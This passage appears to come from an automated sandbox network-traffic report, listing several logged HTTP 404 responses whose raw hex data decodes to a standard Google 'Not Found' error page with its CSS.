74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 16 Dec 2024 07:28:32 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 16 Dec 2024 07:28:34 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 16 Dec 2024 07:28:37 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 16 Dec 2024 07:28:40 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 16 Dec 2024 07:28:42 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 16 Dec 2024 07:28:45 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
